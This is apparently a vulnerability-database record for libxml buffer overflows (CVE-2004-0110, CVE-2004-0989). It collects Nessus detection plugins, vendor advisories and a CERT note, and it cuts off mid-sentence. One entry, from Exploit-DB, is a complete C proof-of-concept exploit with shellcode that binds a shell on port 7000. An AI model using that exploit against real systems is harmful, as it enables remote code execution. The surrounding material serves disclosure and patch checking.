value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libxml-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/03/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/05/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/07/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 3.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-3\", cpu:\"i386\", reference:\"libxml-1.8.17-9.2\")) flag++;\nif (rpm_check(release:\"CentOS-3\", cpu:\"x86_64\", reference:\"libxml-1.8.17-9.2\")) flag++;\nif (rpm_check(release:\"CentOS-3\", cpu:\"i386\", reference:\"libxml-devel-1.8.17-9.2\")) flag++;\nif (rpm_check(release:\"CentOS-3\", cpu:\"x86_64\", reference:\"libxml-devel-1.8.17-9.2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml / libxml-devel\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:05:22", "description": "An updated libxml package that fixes multiple buffer overflows is now\navailable.\n\n[Updated 24 May 2005] Multilib packages have been added to this\nadvisory\n\nThe libxml package contains a library for manipulating XML files.\n\nMultiple buffer overflow bugs have been found in libxml versions prior\nto 2.6.14. If an attacker can trick a user into passing a specially\ncrafted FTP URL or FTP proxy URL to an application that uses the\nvulnerable functions of libxml, it could be possible to execute\narbitrary code. Additionally, if an attacker can return a specially\ncrafted DNS request to libxml, it could be possible to execute\narbitrary code. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2004-0989 to this issue.\n\nYuuichi Teranishi discovered a flaw in libxml versions prior to 2.6.6.\nWhen fetching a remote resource via FTP or HTTP, libxml uses special\nparsing routines. These routines can overflow a buffer if passed a\nvery long URL. If an attacker is able to find an application using\nlibxml that parses remote resources and allows them to influence the\nURL, then this flaw could be used to execute arbitrary code. The\nCommon Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CVE-2004-0110 to this issue.\n\nAll users are advised to upgrade to this updated package, which\ncontains backported patches and is not vulnerable to these issues.", "edition": 27, "published": "2004-12-17T00:00:00", "title": "RHEL 2.1 / 3 : libxml (RHSA-2004:650)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0110", "CVE-2004-0989"], "modified": "2004-12-17T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:3", "cpe:/o:redhat:enterprise_linux:2.1", "p-cpe:/a:redhat:enterprise_linux:libxml", "p-cpe:/a:redhat:enterprise_linux:libxml-devel"], "id": "REDHAT-RHSA-2004-650.NASL", "href": "https://www.tenable.com/plugins/nessus/15991", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2004:650. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15991);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2004-0110\", \"CVE-2004-0989\");\n script_bugtraq_id(9718);\n script_xref(name:\"RHSA\", value:\"2004:650\");\n\n script_name(english:\"RHEL 2.1 / 3 : libxml (RHSA-2004:650)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated libxml package that fixes multiple buffer overflows is now\navailable.\n\n[Updated 24 May 2005] Multilib packages have been added to this\nadvisory\n\nThe libxml package contains a library for manipulating XML files.\n\nMultiple buffer overflow bugs have been found in libxml versions prior\nto 2.6.14. If an attacker can trick a user into passing a specially\ncrafted FTP URL or FTP proxy URL to an application that uses the\nvulnerable functions of libxml, it could be possible to execute\narbitrary code. Additionally, if an attacker can return a specially\ncrafted DNS request to libxml, it could be possible to execute\narbitrary code. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2004-0989 to this issue.\n\nYuuichi Teranishi discovered a flaw in libxml versions prior to 2.6.6.\nWhen fetching a remote resource via FTP or HTTP, libxml uses special\nparsing routines. These routines can overflow a buffer if passed a\nvery long URL. If an attacker is able to find an application using\nlibxml that parses remote resources and allows them to influence the\nURL, then this flaw could be used to execute arbitrary code. The\nCommon Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CVE-2004-0110 to this issue.\n\nAll users are advised to upgrade to this updated package, which\ncontains backported patches and is not vulnerable to these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2004-0110\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2004-0989\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2004:650\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libxml and / or libxml-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libxml-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/03/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/05/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/12/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(2\\.1|3)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1 / 3.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2004:650\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"libxml-1.8.14-3\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"libxml-devel-1.8.14-3\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"libxml-1.8.17-9.2\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"libxml-devel-1.8.17-9.2\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml / libxml-devel\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:02:49", "description": "This update adds missing patches for a buffer overflow in URL parsing\ncode (CVE-2004-0989) and a buffer overflow while handling DNS\nresponses. (CVE-2004-0110)\n\nThese bugs can be exploited remotely to execute arbitrary code.", "edition": 24, "published": "2009-09-24T00:00:00", "title": "SuSE9 Security Update : libxml (YOU Patch Number 9579)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0110", "CVE-2004-0989"], "modified": "2009-09-24T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE9_9579.NASL", "href": "https://www.tenable.com/plugins/nessus/41341", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41341);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2004-0110\", \"CVE-2004-0989\");\n\n script_name(english:\"SuSE9 Security Update : libxml (YOU Patch Number 9579)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 9 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update adds missing patches for a buffer overflow in URL parsing\ncode (CVE-2004-0989) and a buffer overflow while handling DNS\nresponses. (CVE-2004-0110)\n\nThese bugs can be exploited remotely to execute arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2004-0110/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2004-0989/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply YOU patch number 9579.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/12/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 9 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SUSE9\", reference:\"libxml-1.8.17-366.4\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"libxml-devel-1.8.17-366.4\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"x86_64\", reference:\"libxml-32bit-9-200412202049\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-01-31T12:31:34", "description": "libxml 2.6.12 nanoftp Remote Buffer Overflow Proof of Concept Exploit. CVE-2004-0110. Local exploit for linux platform", "published": "2004-10-26T00:00:00", "type": "exploitdb", "title": "libxml 2.6.12 nanoftp Remote Buffer Overflow Proof of Concept Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0110"], "modified": "2004-10-26T00:00:00", "id": "EDB-ID:601", "href": "https://www.exploit-db.com/exploits/601/", "sourceData": "/*\r\n * libxml 2.6.12 nanoftp bof POC infamous42mdAThotpopDOTcom\r\n *\r\n * [n00b localho outernet] gcc -Wall libsuxml.c -lxml2\r\n * [n00b localho outernet] ./a.out \r\n * Usage: ./a.out <retaddr> [ align ]\r\n * [n00b localho outernet] netstat -ant | grep 7000\r\n * [n00b localho outernet] ./a.out 0xbfff0360\r\n * xmlNanoFTPScanURL: Use [IPv6]/IPv4 format\r\n * [n00b localho outernet] netstat -ant | grep 7000\r\n * tcp 0 0 0.0.0.0:7000 0.0.0.0:* LISTEN \r\n \r\n *\r\n */\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <netinet/in.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <libxml/nanoftp.h>\r\n\r\n#define die(x) do{ perror((x)); exit(1); }while(0)\r\n#define BS 0x10000\r\n#define NOP 0x90\r\n#define NNOPS 3000\r\n#define ALIGN 0\r\n\r\n/* call them */\r\n#define SHELL_LEN (sizeof(sc)-1)\r\nchar sc[] =\r\n \"\\x31\\xc0\\x50\\x50\\x66\\xc7\\x44\\x24\\x02\\x1b\\x58\\xc6\\x04\\x24\\x02\\x89\\xe6\"\r\n \"\\xb0\\x02\\xcd\\x80\\x85\\xc0\\x74\\x08\\x31\\xc0\\x31\\xdb\\xb0\\x01\\xcd\\x80\\x50\"\r\n \"\\x6a\\x01\\x6a\\x02\\x89\\xe1\\x31\\xdb\\xb0\\x66\\xb3\\x01\\xcd\\x80\\x89\\xc5\\x6a\"\r\n \"\\x10\\x56\\x50\\x89\\xe1\\xb0\\x66\\xb3\\x02\\xcd\\x80\\x6a\\x01\\x55\\x89\\xe1\\x31\"\r\n \"\\xc0\\x31\\xdb\\xb0\\x66\\xb3\\x04\\xcd\\x80\\x31\\xc0\\x50\\x50\\x55\\x89\\xe1\\xb0\"\r\n \"\\x66\\xb3\\x05\\xcd\\x80\\x89\\xc5\\x31\\xc0\\x89\\xeb\\x31\\xc9\\xb0\\x3f\\xcd\\x80\"\r\n \"\\x41\\x80\\xf9\\x03\\x7c\\xf6\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\"\r\n \"\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\x99\\xb0\\x0b\\xcd\\x80\";\r\n \r\n \r\n/*\r\n */\r\nint main(int argc, char **argv)\r\n{\r\n int x = 0, len = 0;\r\n char buf[BS] = {'A',};\r\n long retaddr = 0, align = ALIGN;\r\n\r\n if(argc < 2){\r\n fprintf(stderr, \"Usage: %s <retaddr> [ align ]\\n\", argv[0]);\r\n return EXIT_FAILURE;\r\n }\r\n if(sscanf(argv[1], \"%lx\", &retaddr) != 1)\r\n die(\"sscanf\");\r\n if(argc > 2)\r\n align = atoi(argv[2]);\r\n if(align < 0 || align > 3)\r\n die(\"nice try newblar\");\r\n\r\n strncpy(buf, \"://[\", 4);\r\n len += 4;\r\n memset(buf+len, NOP, NNOPS);\r\n len += NNOPS;\r\n memcpy(buf+len, sc, SHELL_LEN);\r\n len += SHELL_LEN;\r\n \r\n len += align;\r\n for(x = 0; x < 2000 - (sizeof(retaddr) - 1); x += sizeof(retaddr))\r\n memcpy(buf+len+x, &retaddr, sizeof(retaddr));\r\n buf[len+x] = ']';\r\n buf[len+x+1] = 0;\r\n\r\n xmlNanoFTPNewCtxt(buf);\r\n\r\n return EXIT_SUCCESS;\r\n}\n\n// milw0rm.com [2004-10-26]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/601/"}], "freebsd": [{"lastseen": "2019-05-29T18:35:20", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0110"], "description": "\nYuuichi Teranishi reported a crash in libxml2's URI handling\n\t when a long URL is supplied.\tThe implementation in nanohttp.c\n\t and nanoftp.c uses a 4K stack buffer, and longer URLs will\n\t overwrite the stack.\tThis could result in denial-of-service\n\t or arbitrary code execution in applications using libxml2\n\t to parse documents.\n", "edition": 4, "modified": "2004-02-08T00:00:00", "published": "2004-02-08T00:00:00", "id": "847ADE05-6717-11D8-B321-000A95BC6FAE", "href": "https://vuxml.freebsd.org/freebsd/847ade05-6717-11d8-b321-000a95bc6fae.html", "title": "libxml2 stack buffer overflow in URI parsing", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:09", "bulletinFamily": "software", "cvelist": ["CVE-2004-0110"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ---------------------------------------------------------------------\r\n Red Hat Security Advisory\r\n\r\nSynopsis: Updated libxml2 packages fix security vulnerability\r\nAdvisory ID: RHSA-2004:091-01\r\nIssue date: 2004-02-26\r\nUpdated on: 2004-02-26\r\nProduct: Red Hat Linux\r\nKeywords: \r\nCross references: \r\nObsoletes: \r\nCVE Names: CAN-2004-0110\r\n- ---------------------------------------------------------------------\r\n\r\n1. Topic:\r\n\r\nUpdated libxml2 packages that fix an overflow when parsing remote resources\r\nare now available.\r\n\r\n2. Relevant releases/architectures:\r\n\r\nRed Hat Linux 9 - i386\r\n\r\n3. Problem description:\r\n\r\nlibxml2 is a library for manipulating XML files.\r\n\r\nYuuichi Teranishi discovered a flaw in libxml2 versions prior to 2.6.6. \r\nWhen fetching a remote resource via FTP or HTTP, libxml2 uses special\r\nparsing routines. These routines can overflow a buffer if passed a very\r\nlong URL. If an attacker is able to find an application using libxml2 that\r\nparses remote resources and allows them to influence the URL, then this\r\nflaw could be used to execute arbitrary code. The Common Vulnerabilities\r\nand Exposures project (cve.mitre.org) has assigned the name CAN-2004-0110\r\nto this issue.\r\n\r\nAll users are advised to upgrade to these updated packages, which contain a\r\nbackported fix and are not vulnerable to this issue.\r\n\r\n4. Solution:\r\n\r\nBefore applying this update, make sure all previously released errata\r\nrelevant to your system have been applied.\r\n\r\nTo update all RPMs for your particular architecture, run:\r\n\r\nrpm -Fvh [filenames]\r\n\r\nwhere [filenames] is a list of the RPMs you wish to upgrade. Only those\r\nRPMs which are currently installed will be updated. Those RPMs which are\r\nnot installed but included in the list will not be updated. Note that you\r\ncan also use wildcards (*.rpm) if your current directory *only* contains the\r\ndesired RPMs.\r\n\r\nPlease note that this update is also available via Red Hat Network. Many\r\npeople find this an easier way to apply updates. To use Red Hat Network,\r\nlaunch the Red Hat Update Agent with the following command:\r\n\r\nup2date\r\n\r\nThis will start an interactive process that will result in the appropriate\r\nRPMs being upgraded on your system.\r\n\r\nIf up2date fails to connect to Red Hat Network due to SSL\r\nCertificate Errors, you need to install a version of the\r\nup2date client with an updated certificate. The latest version of\r\nup2date is available from the Red Hat FTP site and may also be\r\ndownloaded directly from the RHN website:\r\n\r\nhttps://rhn.redhat.com/help/latest-up2date.pxt\r\n\r\n5. RPMs required:\r\n\r\nRed Hat Linux 9:\r\n\r\nSRPMS:\r\nftp://updates.redhat.com/9/en/os/SRPMS/libxml2-2.5.4-2.src.rpm\r\n\r\ni386:\r\nftp://updates.redhat.com/9/en/os/i386/libxml2-2.5.4-2.i386.rpm\r\nftp://updates.redhat.com/9/en/os/i386/libxml2-devel-2.5.4-2.i386.rpm\r\nftp://updates.redhat.com/9/en/os/i386/libxml2-python-2.5.4-2.i386.rpm\r\n\r\n\r\n\r\n6. Verification:\r\n\r\nMD5 sum Package Name\r\n- --------------------------------------------------------------------------\r\n\r\n7a1834ebc511ce8752dab9265ed0e3dd 9/en/os/SRPMS/libxml2-2.5.4-2.src.rpm\r\nf9663aacd4980f9e2805f90ea6f8fd93 9/en/os/i386/libxml2-2.5.4-2.i386.rpm\r\nef2c2b5b8644ac165529a45d34029d3d 9/en/os/i386/libxml2-devel-2.5.4-2.i386.rpm\r\n1c269ed922321b3cce101408767de3ad 9/en/os/i386/libxml2-python-2.5.4-2.i386.rpm\r\n\r\nThese packages are GPG signed by Red Hat for security. Our key is\r\navailable from https://www.redhat.com/security/keys.html\r\n\r\nYou can verify each package with the following command:\r\n \r\n rpm --checksig -v <filename>\r\n\r\nIf you only wish to verify that each package has not been corrupted or\r\ntampered with, examine only the md5sum with the following command:\r\n \r\n md5sum <filename>\r\n\r\n\r\n7. References:\r\n\r\nhttp://mail.gnome.org/archives/xml/2004-February/msg00070.html\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0110\r\n\r\n8. Contact:\r\n\r\nThe Red Hat security contact is <secalert@redhat.com>. More contact\r\ndetails at https://www.redhat.com/solutions/security/news/contact.html\r\n\r\nCopyright 2003 Red Hat, Inc.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.0.7 (GNU/Linux)\r\n\r\niD8DBQFAPaQjXlSAg2UNWIIRAjgBAKCrCcz2z1BBVAz3nvu8uZrT4unYuwCgp8JK\r\nfcRHkPyCU8AOvEbvrjmlp8w=\r\n=Lbgx\r\n-----END PGP SIGNATURE-----\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.netsys.com/full-disclosure-charter.html", "edition": 1, "modified": "2004-02-26T00:00:00", "published": "2004-02-26T00:00:00", "id": "SECURITYVULNS:DOC:5830", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:5830", "title": "[Full-Disclosure] [RHSA-2004:091-01] Updated libxml2 packages fix security vulnerability", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "centos": [{"lastseen": "2020-07-17T03:28:07", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0110", "CVE-2004-0989"], "description": "**CentOS Errata and Security Advisory** CESA-2004:650\n\n\nThe libxml package contains a library for manipulating XML files.\r\n\r\nMultiple buffer overflow bugs have been found in libxml versions prior to\r\n2.6.14. If an attacker can trick a user into passing a specially crafted\r\nFTP URL or FTP proxy URL to an application that uses the vulnerable\r\nfunctions of libxml, it could be possible to execute arbitrary code. \r\nAdditionally, if an attacker can return a specially crafted DNS request to\r\nlibxml, it could be possible to execute arbitrary code. The Common\r\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the name\r\nCAN-2004-0989 to this issue.\r\n\r\nYuuichi Teranishi discovered a flaw in libxml versions prior to 2.6.6.\r\nWhen fetching a remote resource via FTP or HTTP, libxml uses special\r\nparsing routines. These routines can overflow a buffer if passed a very\r\nlong URL. If an attacker is able to find an application using libxml that\r\nparses remote resources and allows them to influence the URL, then this\r\nflaw could be used to execute arbitrary code. The Common Vulnerabilities\r\nand Exposures project (cve.mitre.org) has assigned the name CAN-2004-0110\r\nto this issue.\r\n\r\nAll users are advised to upgrade to this updated package, which contains\r\nbackported patches and is not vulnerable to these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2005-May/023803.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-May/023804.html\n\n**Affected packages:**\nlibxml\nlibxml-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2004-650.html", "edition": 6, "modified": "2005-05-27T13:28:32", "published": "2005-05-27T13:28:28", "href": "http://lists.centos.org/pipermail/centos-announce/2005-May/023803.html", "id": "CESA-2004:650", "title": "libxml security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:44:02", "bulletinFamily": "info", "cvelist": ["CVE-2003-0973", "CVE-2004-0110"], "description": "### Overview \n\n[Libxml](<http://www.xmlsoft.org/>) is the XML parser for [Gnome](<http://www.gnome.org/>), a desktop suite and development platform for Linux systems. Libxml2, the latest version of the library as of this writing, has a buffer overflow vulnerability which may allow execution of arbitrary code.\n\n### Description \n\n[Gnome](<http://www.gnome.org/>), a desktop suite and development platform for Linux systems, uses [Libxml](<http://www.xmlsoft.org/>) as an XML parser to handle encoding and decoding or URI strings (this is part of the GNOME XML Toolkit). The Libxml2 release of Libxml prior to version 2.6.6 (published Feb 12 2004) contains a buffer overflow vulnerability when parsing URI strings in XML-structrued files. If the URI is over 4096 bytes, it may be possible to crash software using a vulnerable version of Libxml2. \n \n--- \n \n### Impact \n\nThe complete impact of this vulnerability is not yet known. It is reported to cause a SEGV in software using a vulnerable version of Libxml2. \n \n--- \n \n### Solution \n\nUpdate to Libxml2 version 2.6.6 or later at <http://www.xmlsoft.org/downloads.html> \n \n--- \n \n### Vendor Information\n\n493966\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Debian __ Affected\n\nUpdated: March 09, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nPlease see <http://www.debian.org/security/2004/dsa-455>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \n- -------------------------------------------------------------------------- \nDebian Security Advisory DSA 455-1 security@debian.org \n``<http://www.debian.org/security/>`` Martin Schulze \nMarch 3rd, 2004 ``<http://www.debian.org/security/faq>`` \n- -------------------------------------------------------------------------- \n \nPackage : libxml, libxml2 \nVulnerability : buffer overflows \nProblem-Type : remote \nDebian-specific: no \nCVE ID : CAN-2004-0110 \n \nlibxml2 is a library for manipulating XML files. \n \nYuuichi Teranishi discovered a flaw in libxml, the GNOME XML library. \nWhen fetching a remote resource via FTP or HTTP, the library uses \nspecial parsing routines which can overflow a buffer if passed a very \nlong URL. If an attacker is able to find an application using libxml1 \nor libxml2 that parses remote resources and allows the attacker to 